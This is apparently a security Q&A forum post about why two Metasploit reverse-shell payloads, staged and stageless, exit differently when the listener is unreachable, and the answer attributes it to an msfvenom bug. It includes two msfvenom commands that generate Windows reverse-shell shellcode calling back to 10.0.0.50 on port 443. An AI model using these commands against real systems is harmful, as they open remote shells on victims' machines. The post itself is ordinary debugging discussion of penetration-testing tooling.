# Difference between "windows/shell_reverse_tcp" and "windows/shell/reverse_tcp" Exit Behavior

Tags: msfvenom

The above 2 Metasploit payloads are used to create a reverse shell from one system to another. The difference between them is clearly explained here https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work

However, I am trying to understand how both payloads will act if the system they are trying to connect to is not reachable.

for example:

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.50 LPORT=443
```

and

```
msfvenom -p windows/shell/reverse_tcp LHOST=10.0.0.50 LPORT=443
```

will try to connect to "10.0.0.50". The question is how each payload is going to act if "10.0.0.50" is not listening on port "443" ?

Both payloads are using `EXITFUNC  process`, however, when I run them inside a debugger and place a breakpoint at the last instruction of the shellcode, I got different results.

I see both of them utilize "mswsock.dll" trying to connect to the remote system, once timed out (default is 5 seconds):

- `shell_reverse_tcp` will show "process terminated" inside the debugger and **EIP** is pointing to `ntdll.KiFastSystemCallRet`. The breakpoint will never be hit
- on the other hand `shell/reverse_tcp` will hit the breakpoint at the end of the shellcode

Notes:

- I confirmed that both payloads working fine by connecting successfully to the remote system if its listening on the preconfigured port.
- `shell_reverse_tcp` hits the breakpoint only if it first was able to connect to the remote system. After exiting the shell on the remote system using `exit` inside CMD, then the breakpoint will be hit.

Any idea why one is hitting the breakpoint and one does not if the remote listener is not reachable ?

Thanks in advance.

Comment: i thought always one is staged and the other is Non-staged payload (windows/shell_reverse_tcp) Cheers

Answer (score 3):

It turns out to be a bug with the shellcode generated by msfvenom

https://github.com/rapid7/metasploit-framework/issues/5811